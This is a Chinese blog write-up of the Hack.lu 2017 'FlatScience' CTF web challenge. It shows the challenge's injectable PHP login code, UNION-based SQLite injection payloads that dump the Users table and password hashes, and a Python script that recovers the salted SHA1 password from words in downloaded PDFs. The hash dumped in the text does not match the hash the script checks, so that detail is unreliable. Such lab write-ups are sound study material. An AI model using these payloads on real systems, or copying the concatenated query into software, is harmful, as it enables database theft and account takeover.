[wp] Hack.lu 2017 FlatScience

最新推荐文章于 2023-10-25 19:15:00 发布
最新推荐文章于 2023-10-25 19:15:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网安 文章标签: sqlite
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40884727/article/details/100935874
版权

进去就是页面跳来跳去emmm,先扫个目录好了:
在这里插入图片描述
扫到一个login.php,查看源码,发现参数debug,传参?debug=1,得到如下代码:

<?php 
if(isset($_POST['usr']) && isset($_POST['pw'])){ 
        $user = $_POST['usr']; 
        $pass = $_POST['pw']; 

        $db = new SQLite3('../fancy.db'); 
         
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'"); 
    if($res){ 
        $row = $res->fetchArray(); 
    } 
    else{ 
        echo "<br>Some Error occourred!"; 
    } 

    if(isset($row['id'])){ 
            setcookie('name',' '.$row['name'], time() + 60, '/'); 
            header("Location: /"); 
            die(); 
    } 

} 

if(isset($_GET['debug'])) 
highlight_file('login.php'); 
?>

注意这里是sqlite数据库,我一开始以为是mysql爆了半天啥都没有…
usr=’ union select name, name from sqlite_master where type=‘table’–&pw=222

在这里插入图片描述

usr=' union SELECT sql,sql FROM sqlite_master WHERE tbl_name = 'Users' and type = 'table'--+&pw=222

在这里插入图片描述
接下来开始查字段:

usr=' union select id, id from Users limit 1,1 --1
usr=' union select name, name from Users limit 1,1 --admin
usr=' union select pass, word from Users limit 1,1 --34b0bb7c304949f9ff2fc101eef0f048be10d3bd
usr=' union select hint, hint from Users limit 1,1 -- my fav word in my fav paper?!

改成limit 2,1就能查id为2的用户,最后一共3个用户,我也就不列出来了,
这里的提示应该是说在fav paper中找到一个词+Salz之后sha1得到的值为34b0bb7c304949f9ff2fc101eef0f048be10d3bd,
那首先要找到fav paper,不然就干脆每篇文章都搞过去
看了一会儿文章我表示放弃…
决定写个脚本把pdf里面的词都提出来,
先用wget把pdf down下来:

wget ip -r -np -nd -A .pdf

一共30篇.
这里借用网上大佬的脚本:

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
 
if __name__ == "__main__":
	find_password()

得到密码为ThinJerboa,登陆admin.php,得到flag
在这里插入图片描述
emmm,在攻防世界上看到这题,难度是1星,就想顺手做了,这尼玛是1星???
好吧,其实总体的思路也不难,就是有一点耗费时间,

MercyLin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界—-(web进阶)FlatScienceWP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
xctf攻防世界 MISC高手进阶区 MISCall
l8947943的博客
01-17 4010
1. 进入环境,下载附件 给的是一个磁盘文件,不知道怎么打开,果断扔进winhex,如图: 2. 问题分析 判断文件类型 做了这么多题,总结起来就是搜关键词,其次看文件头和尾部是否有包含的文件,最后就是看文件的头进行判断,修改尾缀。 这个题文件开始为425A68,对照:各类文件的文件头标志,得知该文件是个Bzip文件 或者我们把文件扔进kali中查看文件的类型,如图: 修改类型解压 将其修改为bzip2后缀文件然后解压: mv d02f31b893164d56b7a8e5edb47d9be5 d02
【攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1270
题目 ---- FlatScience 一、writeup 二、知识点
[CTF题目总结-web篇]攻防世界:flatscience
T2hunz1
01-13 1649
[CTF题目总结-web篇]攻防世界:flatscience
攻防世界-web-FlatScience
wuh2333的博客
10-25 312
攻防世界,webFlatScience
FlatScience XCTF web进阶区FlatScience详解
林英俊的博客
09-11 493
FlatScience XCTF web进阶区FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
【攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 638
【攻防世界WEB】四星12分
wordpress之wp-settings.php
10-30
wordpress之wp-settings.php
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
WordPress配置文件wp-config.php详解
09-29
主要介绍了WordPress配置文件wp-config.php详解,包含很多控制Wordpress的技巧,需要的朋友可以参考下
WP Internals1.2.rar
06-14
用来解锁、root、备份、恢复wp系统的手机工具,在时间应用中,由于全英文界面很多人放弃使用,其实很好用的
wordpress合理利用wp-config.php文件小功能
09-28
wordpress很多文件和文件夹,虽然经常提到,但我们基本上不会去修改这些文件,绝大部分...但是有一个文件,我们会是不是的修改一下,这个文件就是wp-config.php,当然,这个文件必须在WordPress安装成功之后才能看到
WP function.sln
10-15
WP function.sln
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
wp341.zip_光流
07-14
迭代自组织数据分析,用MATLAB实现的压缩传感,图像的光流法计算的matlab程序。
w3wp.exe进程占用内存过高解决方法
09-30
w3wp.exe是在IIS(因特网信息服务器)与应用程序池相关联的一个进程,如果你有多个应用程序池,就会有对应的多个w3wp.exe的进程实例运行。这个进程用来分配大量的系统资
WP_802.11AX.pdf
07-17
11ax协议
Killw3wp.exe
04-20
对于IIS 管理员来说,经常会碰到 Web 服务器 CPU 占用 100% 的情况,w3wp.exe是IIS工具的一部。w3wp.exe是在IIS(因特网信息服务器)与应用程序池相关联的一个进程,如果你有多个应用程序池,就会有对应的多个w3wp.exe...
wp statistics.12.0.7精简中文简体版
08-10
wp statistics官方最新支持中文的12.0.7版本(12.0.8至最新版本暂无中文支持),为精简插件包大小,操刀去除了其它32国语言字体,保留了英文,中文简体,中文繁体。
wp666666 .com
最新发布
12-13
wp666666.com是一个网站的域名。但是根据提供的信息,很难确定具体是哪个网站。域名wp666666.com通常由网站所有者注册并购买,用于在互联网上识别和定位他们的网站。根据域名,可能可以推断出一些信息,如网站的主题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值